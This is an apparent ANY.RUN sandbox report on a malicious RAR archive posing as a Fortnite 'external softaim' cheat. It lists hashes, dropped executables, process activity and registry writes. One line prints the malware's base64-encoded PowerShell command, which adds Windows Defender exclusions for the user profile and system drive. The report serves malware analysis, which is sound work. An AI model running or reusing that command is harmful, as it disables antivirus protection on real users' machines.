download:

/37akdphvurxgQPMH2WRzGsFMDId-tezFseX6ufQTVrQpK0MinPtSbHB6NdQIlm9IZejbE8G2ks5K7GT6X9TjePK494k8LV8Zyc_JCpqeBTEmro9ZZuNCg0fwLx84RscclaLhedMq6hr7i0PC6hNO4YtVvtomtoN8KWgv2hlF/y53gplyk8x7oqu6/darkFn+external+softaim.rar

Full analysis: https://app.any.run/tasks/6647ba90-93db-424e-b254-c072bb5e70ae
Verdict: Malicious activity
Analysis date: December 04, 2023, 20:54:26
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

2085BCA610F06504D9AAFB7D2E9F8D4F

SHA1:

73010D857E86E51B1BA2ADD2A416DB21862BE5B8

SHA256:

0A51C31FD94BD20A78FBB4C9756DFB127CBA780820BD802A90106C07D14F2FBF

SSDEEP:

98304:+n1pI63Su94umMUCAX4nMj8EEnGp0HoiNPTNdQdD+ueuA5CKewhH7XDQNpsHjABE:AIU5C3B4pRUysTo

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • fn_external.exe (PID: 1360)
      • fn_Chainwebruntimedllnet.exe (PID: 2764)

  • SUSPICIOUS

    • Reads the Internet Settings

      • fn_external.exe (PID: 1360)

    • Starts POWERSHELL.EXE for commands execution

      • fn_external.exe (PID: 1360)

    • Base64-obfuscated command line is found

      • fn_external.exe (PID: 1360)

    • BASE64 encoded PowerShell command has been detected

      • fn_external.exe (PID: 1360)

    • Powershell version downgrade attack

      • powershell.exe (PID: 1860)

  • INFO

    • Checks supported languages

      • fn_external.exe (PID: 1360)
      • fn_Chainwebruntimedllnet.exe (PID: 2764)
      • fortnite_inj.exe (PID: 240)
      • wmpnscfg.exe (PID: 2696)

    • Reads the computer name

      • fn_external.exe (PID: 1360)
      • fn_Chainwebruntimedllnet.exe (PID: 2764)
      • fortnite_inj.exe (PID: 240)
      • wmpnscfg.exe (PID: 2696)

    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 280)

    • Creates files or folders in the user directory

      • fn_external.exe (PID: 1360)

    • Reads the machine GUID from the registry

      • fn_Chainwebruntimedllnet.exe (PID: 2764)
      • fortnite_inj.exe (PID: 240)

    • Reads product name

      • fn_Chainwebruntimedllnet.exe (PID: 2764)

    • Reads Environment values

      • fn_Chainwebruntimedllnet.exe (PID: 2764)

    • Manual execution by a user

      • wmpnscfg.exe (PID: 2696)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
7
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs fn_external.exe no specs fn_external.exe powershell.exe no specs fn_chainwebruntimedllnet.exe fortnite_inj.exe no specs wmpnscfg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
240"C:\Users\admin\AppData\Roaming\fortnite_inj.exe" C:\Users\admin\AppData\Roaming\fortnite_inj.exefn_external.exe
User:
admin
Integrity Level:
HIGH
Description:
temp
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\roaming\fortnite_inj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
280"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\darkFn+external+softaim.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
1360"C:\Users\admin\AppData\Local\Temp\Rar$EXb280.26435\fn_external.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXb280.26435\fn_external.exe
WinRAR.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
0,0,0,0
Modules
Images
c:\users\admin\appdata\local\temp\rar$exb280.26435\fn_external.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
1860"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwBoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAeAByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQB5ACMAPgA="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exefn_external.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2696"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
2764"C:\Users\admin\AppData\Roaming\fn_Chainwebruntimedllnet.exe" C:\Users\admin\AppData\Roaming\fn_Chainwebruntimedllnet.exe
fn_external.exe
User:
admin
Integrity Level:
HIGH
Exit code:
3221225477
Version:
16.10.31418.88
Modules
Images
c:\users\admin\appdata\roaming\fn_chainwebruntimedllnet.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
3676"C:\Users\admin\AppData\Local\Temp\Rar$EXb280.26435\fn_external.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXb280.26435\fn_external.exeWinRAR.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Version:
0,0,0,0
Modules
Images
c:\users\admin\appdata\local\temp\rar$exb280.26435\fn_external.exe
c:\windows\system32\ntdll.dll
Total events
4 060
Read events
3 958
Write events
102
Delete events
0

Modification events

(PID) Process:(280) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\17F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(280) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip
(PID) Process:(280) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(280) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(280) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(280) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(280) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(280) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(280) WinRAR.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(280) WinRAR.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
Executable files
6
Suspicious files
3
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
2764fn_Chainwebruntimedllnet.exeC:\Users\admin\Desktop\CBFkbTPP.log
MD5:
SHA256:
1360fn_external.exeC:\Users\admin\AppData\Roaming\conhost_fn.exeexecutable
MD5:FB5CFCC8B57D03C4B0770350543BA89E
SHA256:55E22D610F70DB44927E98825F8C8BD7E3CB14DE5C31723A9856580493952046
1360fn_external.exeC:\Users\admin\AppData\Roaming\fn_Chainwebruntimedllnet.exeexecutable
MD5:6630FB903553030ACE1B9F5F286974E8
SHA256:DA0393CEAA2EC3FBF6F36BACCB29EAE1EA6DE7F5543FC9B57D7F6DD029CB5CD4
280WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb280.26435\fn_external.exeexecutable
MD5:C37BF945237887FC87702A6E496FFADD
SHA256:8F3D885C17A6DF3F075E060873E7A9FE3B42B89EC4984608640ED49C182CEF94
1860powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16F6D260068B85896C0EBB2E1B2A60D1
SHA256:6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984
1860powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF214872.TMPbinary
MD5:16F6D260068B85896C0EBB2E1B2A60D1
SHA256:6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984
280WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb280.26435\eac_bypass.dllexecutable
MD5:612080028164B12939751DCCCBB68D4A
SHA256:E96030FDDAF7E78401567EE82480AD75EE48D3556199A3F85C0EC669EDAC2EF4
1860powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\029D7PSK8FE5CDYI8H9Y.tempbinary
MD5:16F6D260068B85896C0EBB2E1B2A60D1
SHA256:6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984
1360fn_external.exeC:\Users\admin\AppData\Roaming\fortnite_inj.exeexecutable
MD5:4BE18B969A717E75252D52C86746C258
SHA256:FC90DC77B6BB5DC681FC3FCA150F3E65B3A687B0E249CBD277129D0D342BD0E1
2764fn_Chainwebruntimedllnet.exeC:\Users\admin\Desktop\FsvbiPPI.logexecutable
MD5:D8BF2A0481C0A17A634D066A711C12E9
SHA256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
5
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1080
svchost.exe
224.0.0.252:5355
unknown
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
2588
svchost.exe
239.255.255.250:1900
whitelisted

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
/37akdphvurxgQPMH2WRzGsFMDId-tezFseX6ufQTVrQpK0MinPtSbHB6NdQIlm9IZejbE8G2ks5K7GT6X9TjePK494k8LV8Zyc_JCpqeBTEmro9ZZuNCg0fwLx84RscclaLhedMq6hr7i0PC6hNO4YtVvtomtoN8KWgv2hlF/y53gplyk8x7oqu6/darkFn+external+softaim.rar